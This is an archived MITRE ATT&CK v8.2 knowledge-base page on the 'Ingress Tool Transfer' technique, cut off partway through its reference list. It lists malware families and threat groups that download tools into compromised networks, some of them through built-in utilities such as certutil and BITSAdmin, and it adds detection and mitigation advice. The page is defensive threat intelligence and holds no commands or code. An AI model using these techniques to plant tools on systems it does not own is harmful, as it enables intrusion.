Currently viewing ATT&CK v8.2 which was live between October 27, 2020 and April 28, 2021. Learn more about the versioning system or see the live site.
TECHNIQUES
Enterprise
Reconnaissance
Active Scanning
Gather Victim Host Information
Gather Victim Identity Information
Gather Victim Network Information
Gather Victim Org Information
Phishing for Information
Search Closed Sources
Search Open Technical Databases
Search Open Websites/Domains
Resource Development
Acquire Infrastructure
Compromise Accounts
Compromise Infrastructure
Develop Capabilities
Establish Accounts
Obtain Capabilities
Initial Access
Phishing
Supply Chain Compromise
Valid Accounts
Execution
Command and Scripting Interpreter
Inter-Process Communication
Scheduled Task/Job
System Services
User Execution
Persistence
Account Manipulation
Boot or Logon Autostart Execution
Boot or Logon Initialization Scripts
Create Account
Create or Modify System Process
Event Triggered Execution
Hijack Execution Flow
Office Application Startup
Pre-OS Boot
Scheduled Task/Job
Server Software Component
Traffic Signaling
Valid Accounts
Privilege Escalation
Abuse Elevation Control Mechanism
Access Token Manipulation
Boot or Logon Autostart Execution
Boot or Logon Initialization Scripts
Create or Modify System Process
Domain Policy Modification
Event Triggered Execution
Hijack Execution Flow
Process Injection
Scheduled Task/Job
Valid Accounts
Defense Evasion
Abuse Elevation Control Mechanism
Access Token Manipulation
Domain Policy Modification
Execution Guardrails
File and Directory Permissions Modification
Hide Artifacts
Hijack Execution Flow
Impair Defenses
Indicator Removal on Host
Masquerading
Modify Authentication Process
Modify Cloud Compute Infrastructure
Modify System Image
Network Boundary Bridging
Obfuscated Files or Information
Pre-OS Boot
Process Injection
Signed Binary Proxy Execution
Signed Script Proxy Execution
Subvert Trust Controls
Traffic Signaling
Trusted Developer Utilities Proxy Execution
Use Alternate Authentication Material
Valid Accounts
Virtualization/Sandbox Evasion
Weaken Encryption
Credential Access
Brute Force
Credentials from Password Stores
Forge Web Credentials
Input Capture
Man-in-the-Middle
Modify Authentication Process
OS Credential Dumping
Steal or Forge Kerberos Tickets
Unsecured Credentials
Discovery
Account Discovery
Permission Groups Discovery
Software Discovery
Virtualization/Sandbox Evasion
Lateral Movement
Remote Service Session Hijacking
Remote Services
Use Alternate Authentication Material
Collection
Archive Collected Data
Data from Configuration Repository
Data from Information Repositories
Data Staged
Email Collection
Input Capture
Man-in-the-Middle
Command and Control
Application Layer Protocol
Data Encoding
Data Obfuscation
Dynamic Resolution
Encrypted Channel
Proxy
Traffic Signaling
Web Service
Exfiltration
Automated Exfiltration
Exfiltration Over Alternative Protocol
Exfiltration Over Other Network Medium
Exfiltration Over Physical Medium
Exfiltration Over Web Service
Impact
Data Manipulation
Defacement
Disk Wipe
Endpoint Denial of Service
Network Denial of Service
Mobile
Initial Access
Execution
Persistence
Privilege Escalation
Defense Evasion
Credential Access
Discovery
Lateral Movement
Collection
Command and Control
Exfiltration
Impact
Network Effects
Remote Service Effects
  1. Home
  2. Techniques
  3. Enterprise
  4. Ingress Tool Transfer

Ingress Tool Transfer

Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.

ID: T1105
Sub-techniques:  No sub-techniques
Tactic: Command And Control
Platforms: Linux, Windows, macOS
Permissions Required: User
Data Sources: File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Version: 2.0
Created: 31 May 2017
Last Modified: 20 March 2020

Procedure Examples

Name Description
ABK

ABK has the ability to download files from C2.[1]
Agent Tesla

Agent Tesla can download additional files for execution on the victim’s machine.[2][3]
Agent.btz

Agent.btz attempts to download an encrypted binary from a specified domain.[4]
Anchor

Anchor can download additional payloads.[5][6]
APT-C-36

APT-C-36 has downloaded binary data from a specified domain after the malicious document is opened.[7]
APT18

APT18 can upload a file to the victim’s machine.[8]
APT28

APT28 has downloaded additional files, including by using a first-stage downloader to contact the C2 server to obtain the second-stage implant.[9][10][11]
APT3

APT3 has a tool that can copy files to remote machines.[12]
APT32

APT32 has added JavaScript to victim websites to download additional frameworks that profile and compromise website visitors.[13]
APT33

APT33 has downloaded additional files and programs from its C2 server.[14][15]

APT37

APT37 has downloaded second stage malware from compromised websites.[16][17]
APT38

APT38 used a backdoor, NESTEGG, that has the capability to download and upload files to and from a victim’s machine.[18]
APT39

APT39 has downloaded tools to compromised hosts.[19]
APT41

APT41 used certutil to download additional files.[20]
Aria-body

Aria-body has the ability to download additional payloads from C2.[21]
Astaroth

Astaroth uses certutil and BITSAdmin to download additional malware. [22][23]
Attor

Attor can download additional plugins, updates and other files. [24]
AuditCred

AuditCred can download files and additional malware.[25]
Avenger

Avenger has the ability to download files from C2 to a compromised host.[1]
Azorult

Azorult can download and execute additional files. Azorult has also downloaded a ransomware payload called Hermes.[26][27]
BabyShark

BabyShark has downloaded additional files from the C2.[28]
BackConfig

BackConfig can download and execute additional payloads on a compromised host.[29]
BADNEWS

BADNEWS is capable of downloading additional files through C2 channels, including a new version of itself.[30][31][32]
BadPatch

BadPatch can download and execute or update malware.[33]
Bankshot

Bankshot uploads files and secondary payloads to the victim's machine.[34]
BBK

BBK has the ability to download files from C2 to the infected host.[1]
BISCUIT

BISCUIT has a command to download a file from the C2 server.[35]
Bisonal

Bisonal has the capability to download files to execute on the victim’s machine.[36]
BITSAdmin

BITSAdmin can be used to create BITS Jobs to upload and/or download files.[37]
Bonadan

Bonadan can download additional modules from the C2 server.[38]
BONDUPDATER

BONDUPDATER can download or upload files from its C2 server.[39]
Briba

Briba downloads files onto infected hosts.[40]
BRONZE BUTLER

BRONZE BUTLER has used various tools to download files, including DGet (a similar tool to wget).[41]
build_downer

build_downer has the ability to download files from C2 to the infected host.[1]
Bundlore

Bundlore can download and execute new versions of itself.[42]
Calisto

Calisto has the capability to upload and download files to the victim's machine.[43]
CallMe

CallMe has the capability to download a file to the victim from the C2 server.[44]
Cannon

Cannon can download a payload for execution.[45]
Carberp

Carberp can download and execute new plugins from the C2 server. [46][47]
Cardinal RAT

Cardinal RAT can download and execute additional payloads.[48]
CARROTBALL

CARROTBALL has the ability to download and install a remote payload.[49]
CARROTBAT

CARROTBAT has the ability to download and execute a remote file via certutil.[50]
certutil

certutil can be used to download files from a given URL.[51][52]
ChChes

ChChes is capable of downloading files, including additional modules.[53][54][55]
Chimera

Chimera has remotely copied tools and malware onto targeted systems.[56]
China Chopper

China Chopper's server component can download remote files.[57][58][59]
CHOPSTICK

CHOPSTICK is capable of performing remote file transmission.[60]
CloudDuke

CloudDuke downloads and executes additional malware from either a Web address or a Microsoft OneDrive account.[61]
cmd

cmd can be used to copy files to/from a remotely connected external system.[62]
Cobalt Group

Cobalt Group has used public sites such as github.com and sendspace.com to upload files and then download them to victim computers.[63][64] The group's JavaScript backdoor is also capable of downloading files.[65]
CoinTicker

CoinTicker executes a Python script to download its second stage.[66]
CookieMiner

CookieMiner can download additional scripts from a web server.[67]
CORESHELL

CORESHELL downloads another dropper from its C2 server.[68]
Crimson

Crimson contains a command to retrieve files from its C2 server.[69]
Cryptoistic

Cryptoistic has the ability to send and receive files.[70]
Dacls

Dacls can download its payload from a C2 server.[70][71]
DarkComet

DarkComet can load any files onto the infected machine to execute.[72][73]
Daserf

Daserf can download remote files.[74][41]
DDKONG

DDKONG downloads and uploads files on the victim’s machine.[75]
Denis

Denis deploys additional backdoors and hacking tools to the system.[76]
Dipsind

Dipsind can download remote files.[77]
DOGCALL

DOGCALL can download and execute additional payloads.[78]
down_new

down_new has the ability to download files to the compromised host.[1]
Downdelph

After downloading its main config file, Downdelph downloads multiple payloads from C2 servers.[79]
Dragonfly 2.0

Dragonfly 2.0 copied and installed tools for operations once in the victim environment.[80][81]
Drovorub

Drovorub can download files to a compromised host.[82]
Dyre

Dyre has a command to download and executes additional files.[83]
Elderwood

The Ritsol backdoor trojan used by Elderwood can download files onto a compromised host from a remote location.[84]
Elise

Elise can download additional files from the C2 server for execution.[85]
Emissary

Emissary has the capability to download files from the C2 server.[86]
Empire

Empire can upload and download to and from a victim machine.[87]
esentutl

esentutl can be used to copy files to/from a given URL.[88]
EvilBunny

EvilBunny has downloaded additional Lua scripts from the C2.[89]
Exaramel for Linux

Exaramel for Linux has a command to download a file from a remote server.[90]
Felismus

Felismus can download files from remote servers.[91]
FELIXROOT

FELIXROOT downloads and uploads files to and from the victim’s machine.[92][93]
FIN7

FIN7 has downloaded additional malware to execute on the victim's machine, including by using a PowerShell script to launch shellcode that retrieves an additional payload.[94][95]
FIN8

FIN8 has used remote code execution to download subsequent payloads.[96]
Frankenstein

Frankenstein has uploaded and downloaded files to utilize additional plugins.[97]
Gamaredon Group

Tools used by Gamaredon Group are capable of downloading and executing additional payloads.[98][99][100]
Gazer

Gazer can execute a task to download a file.[101][102]
gh0st RAT

gh0st RAT can download files to the victim’s machine.[103][104]
Gold Dragon

Gold Dragon can download additional components from the C2 server.[105]
GoldenSpy

GoldenSpy constantly attempts to download and execute files from the remote C2, including GoldenSpy itself if not found on the system.[106]

Gorgon Group

Gorgon Group malware can download additional files from C2 servers.[107]
GreyEnergy

GreyEnergy can download additional modules and payloads.[93]
H1N1

H1N1 contains a command to download and execute a file from a remotely hosted URL using WinINet HTTP requests.[108]
Hancitor

Hancitor has the ability to download additional files from C2.[109]
HAPPYWORK

can download and execute a second-stage payload.[16]
Helminth

Helminth can download additional files.[110]
Hi-Zor

Hi-Zor has the ability to upload and download files from its C2 server.[111]
HiddenWasp

HiddenWasp downloads a tar compressed archive from a download server to the system.[112]
HOPLIGHT

HOPLIGHT has the ability to connect to a remote host in order to upload and download files.[113]

HotCroissant

HotCroissant has the ability to upload a file from the command and control (C2) server to the victim machine.[114]
HTTPBrowser

HTTPBrowser is capable of writing a file to the compromised system from the C2 server.[115]
Hydraq

Hydraq creates a backdoor through which remote attackers can download files and additional malware components.[116][117]
HyperBro

HyperBro has the ability to download additional files.[118]
IcedID

IcedID has the ability to download additional modules and a configuration file from C2.[119][120]
InvisiMole

InvisiMole can upload files to the victim's machine for operations.[121][122]
Ixeshe

Ixeshe can download and execute additional files.[123]
JHUHUGIT

JHUHUGIT can retrieve an additional payload from its C2 server.[124][125] JHUHUGIT has a command to download files to the victim’s machine.[126]
JPIN

JPIN can download files and upgrade itself.[77]
jRAT

jRAT can download and execute files.[127][128][129]
KARAE

KARAE can upload and download files, including second-stage malware.[16]
Kasidet

Kasidet has the ability to download and execute additional files.[130]
Kazuar

Kazuar downloads additional plug-ins to load on the victim’s machine, including the ability to upgrade and replace its own binary.[131]
Kessel

Kessel can download additional modules from the C2 server.[38]
KeyBoy

KeyBoy has a download and upload functionality.[132][133]
KEYMARBLE

KEYMARBLE can upload files to the victim’s machine and can download additional payloads.[134]
Kivars

Kivars has the ability to download and execute files.[135]
Koadic

Koadic can download additional files.[136]
KONNI

KONNI can download files and execute them on the victim’s machine.[137]
Kwampirs

Kwampirs downloads additional files from C2 servers.[138]
Lazarus Group

Several Lazarus Group malware families are capable of downloading and executing binaries from its C2 server.[139][140][141][70][71]
Leviathan

Leviathan has downloaded additional scripts and files from adversary-controlled servers.[142][57]
LightNeuron

LightNeuron has the ability to download and execute additional files.[143]
Linfo

Linfo creates a backdoor through which remote attackers can download files onto compromised hosts.[144]
LoudMiner

LoudMiner used SCP to update the miner from the C2.[145]
LOWBALL

LOWBALL uses the Dropbox API to request two files, one of which is the same file as the one dropped by the malicious email attachment. This is most likely meant to be a mechanism to update the compromised host with a new version of the LOWBALL malware.[146]
Machete

Machete can download additional files for execution on the victim’s machine.[147]

Magic Hound

Magic Hound has downloaded additional code and files from servers onto victims.[148] Magic Hound used Wrapper/Gholee, custom-developed malware, which downloaded additional malware to the infected system.[149][149]
MCMD

MCMD can upload additional files to a compromised host.[150]
MechaFlounder

MechaFlounder has the ability to upload and download files to and from a compromised host.[151]
menuPass

menuPass has installed updates and new malware on victims.[152][153]
Metamorfo

Metamorfo has used MSI to download files for execution.[154][155][156]
Micropsia

Micropsia can download and execute an executable from the C2 server.[157][158]
MiniDuke

MiniDuke can download additional encrypted backdoors onto the victim via GIF files.[159][160]
Misdat

Misdat is capable of downloading files from the C2.[161]
Mivast

Mivast has the capability to download and execute .exe files.[162]
MobileOrder

MobileOrder has a command to download a file from the C2 server to the victim mobile device's SD card.[44]
Molerats

Molerats used executables to download malicious files from different sources.[163]
More_eggs

More_eggs can download and launch additional payloads.[164][165]
Mosquito

Mosquito can upload and download files to the victim.[166]
MuddyWater

MuddyWater has used malware that can upload additional files to the victim’s machine.[167][168][169]
NanHaiShu

NanHaiShu can download additional files from URLs.[142]
NanoCore

NanoCore has the capability to download and activate additional modules for execution.[170][171]
NavRAT

NavRAT can download files remotely.[172]
NDiskMonitor

NDiskMonitor can download and execute a file from given URL.[32]
Nerex

Nerex creates a backdoor through which remote attackers can download files onto a compromised host.[84]
Netwalker

Operators deploying Netwalker have used psexec and certutil to retrieve the Netwalker payload.[173]
Nidiran

Nidiran can download and execute files.[174]
njRAT

njRAT can download files to the victim’s machine.[175][176]
NOKKI

NOKKI has downloaded a remote module for execution.[177]
Octopus

Octopus can upload and download files to and from the victim’s machine.[178]
OilRig

OilRig can download remote files onto victims.[179]
Okrum

Okrum has built-in commands for uploading, downloading, and executing files to the system.[180]
OopsIE

OopsIE can download files from its C2 server to the victim's machine.[181][182]
Orz

Orz can download files onto the victim.[142]
OSX_OCEANLOTUS.D

OSX_OCEANLOTUS.D has a command to download and execute a file on the victim’s machine.[183]
Pasam

Pasam creates a backdoor through which remote attackers can upload files.[184]
Patchwork

Patchwork payloads download additional files from the C2 server.[185][32]
PipeMon

PipeMon can install additional modules via C2 commands.[186]
Pisloader

Pisloader has a command to upload a file to the victim machine.[187]
PLAINTEE

PLAINTEE has downloaded and executed additional plugins.[75]
PLATINUM

PLATINUM has transferred files using the Intel® Active Management Technology (AMT) Serial-over-LAN (SOL) channel.[188]
PLEAD

PLEAD has the ability to upload and download files to and from an infected host.[189]
PlugX

PlugX has a module to download and execute files on the compromised machine.[190]
PoetRAT

PoetRAT has the ability to copy files and download/upload files into command and control channels (C2) using FTP.[191]
PoisonIvy

PoisonIvy creates a backdoor through which remote attackers can upload files.[192]
PolyglotDuke

PolyglotDuke can retrieve payloads from the C2 server.[160]
Pony

Pony can download additional files onto the infected system.[193]

POSHSPY

POSHSPY downloads and executes additional PowerShell code and Windows binaries.[194]
PowerDuke

PowerDuke has a command to download a file.[195]
POWERSOURCE

POWERSOURCE has been observed being used to download TEXTMATE and the Cobalt Strike Beacon payload onto victims.[196]
POWERSTATS

POWERSTATS can retrieve and execute additional PowerShell payloads from the C2 server.[197]
POWRUNER

POWRUNER can download or upload files from its C2 server.[179]
Psylo

Psylo has a command to download a file to the system from its C2 server.[44]
Pteranodon

Pteranodon can download and execute additional files.[98]
PUNCHBUGGY

PUNCHBUGGY can download additional files and payloads to compromised hosts.[198][199]
Pupy

Pupy can upload and download to/from a victim machine.[200]
QuasarRAT

QuasarRAT can download files to the victim’s machine and execute them.[201][202]
Rancor

Rancor has downloaded additional malware, including by using certutil.[75]
RARSTONE

RARSTONE downloads its backdoor component from a C2 server and loads it directly into memory.[203]
RATANKBA

RATANKBA uploads and downloads information.[204][205]
RDAT

RDAT can download files via DNS.[206]

RedLeaves

RedLeaves is capable of downloading a file from a specified URL.[207]
RegDuke

RegDuke can download files from C2.[160]
Remcos

Remcos can upload and download files to and from the victim’s machine.[208]
RemoteCMD

RemoteCMD copies a file over to the remote system before execution.[209]
Remsec

Remsec contains a network loader to receive executable modules from remote attackers and run them on the local victim. It can also upload and download files over HTTP and HTTPS.[210][211]
Revenge RAT

Revenge RAT has the ability to upload and download files.[212]
REvil

REvil can download a copy of itself from an attacker controlled IP address to the victim machine.[213][214][215]
RGDoor

RGDoor uploads and downloads files to and from the victim’s machine.[216]
Rocke

Rocke used malware to download additional malicious files to the target system.[217]

RogueRobin

RogueRobin can save a new file to the system from the C2 server.[218][219]
ROKRAT

ROKRAT retrieves additional malicious payloads from the C2 server.[220][221]
RTM

RTM can download additional files.[222][223]
Sakula

Sakula has the capability to download files.[224]
Sandworm Team

Sandworm Team's Python backdoor can push additional malicious tools to an infected system.[225]
SDBot

SDBot has the ability to download a DLL from C2 to a compromised host.[226]
SeaDuke

SeaDuke is capable of uploading and downloading files.[227]
Seasalt

Seasalt has a command to download additional files.[35][35]
SEASHARPEE

SEASHARPEE can download remote files onto victims.[228]
ServHelper

ServHelper may download additional files to execute.[229][230]
Shamoon

Shamoon can download an executable to run on the victim.[231]
Sharpshooter

Sharpshooter downloaded additional payloads after a target was infected with a first-stage downloader.[232]
SHARPSTATS

SHARPSTATS has the ability to upload and download files.[233]
ShimRat

ShimRat can download additional files.[234]
ShimRatReporter

ShimRatReporter had the ability to download additional payloads.[234]
SHUTTERSPEED

SHUTTERSPEED can download and execute an arbitary executable.[16]
Silence

Silence has downloaded additional modules and malware to victim’s machines.[235]

Skidmap

Skidmap has the ability to download files on an infected host.[236]

SLOWDRIFT

SLOWDRIFT downloads additional payloads.[16]
Smoke Loader

Smoke Loader downloads a new version of itself once it has installed. It also downloads additional plugins.[237]
Soft Cell

Soft Cell dropped additional tools to victims during their operation, including portqry.exe, a renamed cmd.exe file, winrar, and HTRAN.[238]
SoreFang

SoreFang can download additional payloads from C2.[239][240]
SpeakUp

SpeakUp downloads and executes additional files from a remote server. [241]
SQLRat

SQLRat can make a direct SQL connection to a Microsoft database controlled by the attackers, retrieve an item from the bindata table, then write and execute the file on disk.[242]

StoneDrill

StoneDrill has downloaded and dropped temporary files containing scripts; it additionally has a function to upload files from the victims machine.[243]

StrongPity

StrongPity can download files to specified targets.[244]
Sunburst

Sunburst delivered different payloads, including Teardrop in at least one instance.[245]
TA505

TA505 has downloaded additional malware to execute on victim systems.[246][230][247]
TDTESS

TDTESS has a command to download and execute an additional file.[248]
Threat Group-3390

After re-establishing access to a victim network, Threat Group-3390 actors download tools including gsecdump and WCE that are staged temporarily on websites that were previously compromised but never used.[115]
TrickBot

TrickBot downloads several additional files and saves them to the victim's machine.[249]
Trojan.Karagany

Trojan.Karagany can upload, download, and execute files on the victim.[250][251]
Tropic Trooper

Tropic Trooper has used a delivered trojan to download additional files.[252]
TSCookie

TSCookie has the ability to upload and download files to and from the infected host.[253]
Turla

Turla has used shellcode to download Meterpreter after compromising a victim.[254]
TURNEDUP

TURNEDUP is capable of downloading additional files.[255]
TYPEFRAME

TYPEFRAME can upload and download files to the victim’s machine.[256]
UBoatRAT

UBoatRAT can upload and download files to the victim’s machine.[257]
UNC2452

UNC2452 downloaded additional tools, such as Teardrop malware and Cobalt Strike, to the compromised host following initial compromise.[245]
Unknown Logger

Unknown Logger is capable of downloading remote files.[30]
UPPERCUT

UPPERCUT can download and upload files to and from the victim’s machine.[258]
Ursnif

Ursnif has dropped payload and configuration files to disk. Ursnif has also been used to download and execute additional payloads.[259][260]
Valak

Valak has downloaded a variety of modules and payloads to the compromised host, including IcedID and NetSupport Manager RAT-based malware.[261][262]
Vasport

Vasport can download files.[263]
VBShower

VBShower has the ability to download VBS files to the target computer.[264]
VERMIN

VERMIN can download and upload files to the victim's machine.[265]
Volgmer

Volgmer can download remote files and additional payloads to the victim's machine.[266][267][268]
WEBC2

WEBC2 can download and execute a file.[269]
WellMail

WellMail can receive data and executable scripts from C2.[270]
WellMess

WellMess can write files to a compromised host.[271][272]
Whitefly

Whitefly has the ability to download additional tools from the C2.[273]
Wiarp

Wiarp creates a backdoor through which remote attackers can download files.[274]
Winnti for Linux

Winnti for Linux has the ability to deploy modules directly from command and control (C2) servers, possibly for remote command execution, file exfiltration, and socks5 proxying on the infected host. [275]
WIRTE

WIRTE has downloaded PowerShell code from the C2 server to be executed.[276]
Xbash

Xbash can download additional malicious files from its C2 server.[277]
YAHOYAH

YAHOYAH uses HTTP GET requests to download other files that are executed in memory.[278]
Zebrocy

Zebrocy obtains additional code to execute on the victim's machine, including the downloading of a secondary payload.[279][45][280][11]
ZeroT

ZeroT can download additional payloads onto the victim.[281]
Zeus Panda

Zeus Panda can download additional malware plug-in modules and execute them on the victim’s machine.[282]
ZLib

ZLib has the ability to download files.[161]
ZxShell

ZxShell has a command to transfer files from a remote host.[283]

Mitigations

Mitigation Description
Network Intrusion Prevention

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware or unusual data transfer over known tools and protocols like FTP can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools.[284]

Detection

Monitor for file creation and files transferred into the network. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious.

Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.[284]

References

  1. Chen, J. et al. (2019, November). Operation ENDTRADE: TICK’s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020.
  2. Brumaghin, E., et al. (2018, October 15). Old dog, new tricks - Analysing new RTF-based campaign distributing Agent Tesla, Loki with PyREbox. Retrieved November 5, 2018.
  3. The DigiTrust Group. (2017, January 12). The Rise of Agent Tesla. Retrieved November 5, 2018.
  4. Shevchenko, S.. (2008, November 30). Agent.btz - A Threat That Hit Pentagon. Retrieved April 8, 2016.
  5. Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020.
  6. Grange, W. (2020, July 13). Anchor_dns malware goes cross platform. Retrieved September 10, 2020.
  7. QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020.
  8. Grunzweig, J., et al. (2016, May 24). New Wekby Attacks Use DNS Requests As Command and Control Mechanism. Retrieved November 15, 2018.
  9. Bitdefender. (2015, December). APT28 Under the Scope. Retrieved February 23, 2017.
  10. Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017.
  11. Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.
  12. Chen, X., Scott, M., Caselden, D.. (2014, April 26). New Zero-Day Exploit targeting Internet Explorer Versions 9 through 11 Identified in Targeted Attacks. Retrieved January 14, 2016.
  13. Lassalle, D., et al. (2017, November 6). OceanLotus Blossoms: Mass Digital Surveillance and Attacks Targeting ASEAN, Asian Nations, the Media, Human Rights Groups, and Civil Society. Retrieved November 6, 2017.
  14. Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019.
  15. Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020.
  16. FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018.
  17. GReAT. (2019, May 13). ScarCruft continues to evolve, introduces Bluetooth harvester. Retrieved June 4, 2019.
  18. FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018.
  19. Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020.
  20. Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020.
  21. CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020.
  22. Doaty, J., Garrett, P.. (2018, September 10). We’re Seeing a Resurgence of the Demonic Astaroth WMIC Trojan. Retrieved April 17, 2019.
  23. Salem, E. (2019, February 13). ASTAROTH MALWARE USES LEGITIMATE OS AND ANTIVIRUS PROCESSES TO STEAL PASSWORDS AND PERSONAL DATA. Retrieved April 17, 2019.
  24. Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020.
  25. Trend Micro. (2018, November 20). Lazarus Continues Heists, Mounts Attacks on Financial Organizations in Latin America. Retrieved December 3, 2018.
  26. Yan, T., et al. (2018, November 21). New Wine in Old Bottle: New Azorult Variant Found in FindMyName Campaign using Fallout Exploit Kit. Retrieved November 29, 2018.
  27. Proofpoint. (2018, July 30). New version of AZORult stealer improves loading features, spreads alongside ransomware in new campaign. Retrieved November 29, 2018.
  28. Lim, M.. (2019, April 26). BabyShark Malware Part Two – Attacks Continue Using KimJongRAT and PCRat . Retrieved October 7, 2019.
  29. Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020.
  30. Settle, A., et al. (2016, August 8). MONSOON - Analysis Of An APT Campaign. Retrieved September 22, 2016.
  31. Levene, B. et al.. (2018, March 7). Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent. Retrieved March 31, 2018.
  32. Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.
  33. Bar, T., Conant, S. (2017, October 20). BadPatch. Retrieved November 13, 2018.
  34. US-CERT. (2017, December 13). Malware Analysis Report (MAR) - 10135536-B. Retrieved July 17, 2018.
  35. Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal. Retrieved July 18, 2016.
  36. Hayashi, K., Ray, V. (2018, July 31). Bisonal Malware Used in Attacks Against Russia and South Korea. Retrieved August 7, 2018.
  37. Microsoft. (n.d.). BITSAdmin Tool. Retrieved January 12, 2018.
  38. Dumont, R., M.Léveillé, M., Porcher, H. (2018, December 1). THE DARK SIDE OF THE FORSSHE A landscape of OpenSSH backdoors. Retrieved July 16, 2020.
  39. Wilhoit, K. and Falcone, R. (2018, September 12). OilRig Uses Updated BONDUPDATER to Target Middle Eastern Government. Retrieved February 18, 2019.
  40. Ladley, F. (2012, May 15). Backdoor.Briba. Retrieved February 21, 2018.
  41. Counter Threat Unit Research Team. (2017, October 12). BRONZE BUTLER Targets Japanese Enterprises. Retrieved January 4, 2018.
  42. Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020.
  43. Pantig, J. (2018, July 30). OSX.Calisto. Retrieved September 7, 2018.
  44. Falcone, R. and Miller-Osborn, J.. (2016, January 24). Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists. Retrieved February 10, 2016.
  45. Falcone, R., Lee, B. (2018, November 20). Sofacy Continues Global Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved November 26, 2018.
  46. Giuliani, M., Allievi, A. (2011, February 28). Carberp - a modular information stealing trojan. Retrieved July 15, 2020.
  47. Trusteer Fraud Prevention Center. (2010, October 7). Carberp Under the Hood of Carberp: Malware & Configuration Analysis. Retrieved July 15, 2020.
  48. Grunzweig, J.. (2017, April 20). Cardinal RAT Active for Over Two Years. Retrieved December 8, 2018.
  49. McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. Retrieved June 2, 2020.
  50. Grunzweig, J. and Wilhoit, K. (2018, November 29). The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia. Retrieved June 2, 2020.
  51. Microsoft. (2012, November 14). Certutil. Retrieved July 3, 2017.
  52. LOLBAS. (n.d.). Certutil.exe. Retrieved July 31, 2019.
  53. Miller-Osborn, J. and Grunzweig, J.. (2017, February 16). menuPass Returns with New Malware and New Attacks Against Japanese Academics and Organizations. Retrieved March 1, 2017.
  54. Nakamura, Y.. (2017, February 17). ChChes - Malware that Communicates with C&C Servers Using Cookie Headers. Retrieved March 1, 2017.
  55. FireEye iSIGHT Intelligence. (2017, April 6). APT10 (MenuPass Group): New Tools, Global Campaign Latest Manifestation of Longstanding Threat. Retrieved June 29, 2017.
  56. Cycraft. (2020, April 15). APT Group Chimera - APT Operation Skeleton key Targets Taiwan Semiconductor Vendors. Retrieved August 24, 2020.
  57. FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.
  58. Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down the China Chopper Web Shell - Part I. Retrieved March 27, 2015.
  59. The Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC) and the US National Cybersecurity and Communications Integration Center (NCCIC). (2018, October 11). Joint report on publicly available hacking tools. Retrieved March 11, 2019.
  60. Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.
  61. F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.
  62. Microsoft. (n.d.). Copy. Retrieved April 26, 2016.
  63. Positive Technologies. (2017, August 16). Cobalt Strikes Back: An Evolving Multinational Threat to Finance. Retrieved September 5, 2018.
  64. Positive Technologies. (2016, December 16). Cobalt Snatch. Retrieved October 9, 2018.
  65. Gorelik, M. (2018, October 08). Cobalt Group 2.0. Retrieved November 5, 2018.
  66. Thomas Reed. (2018, October 29). Mac cryptocurrency ticker app installs backdoors. Retrieved April 23, 2019.
  67. Chen, y., et al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges’ Cookies. Retrieved July 22, 2020.
  68. FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.
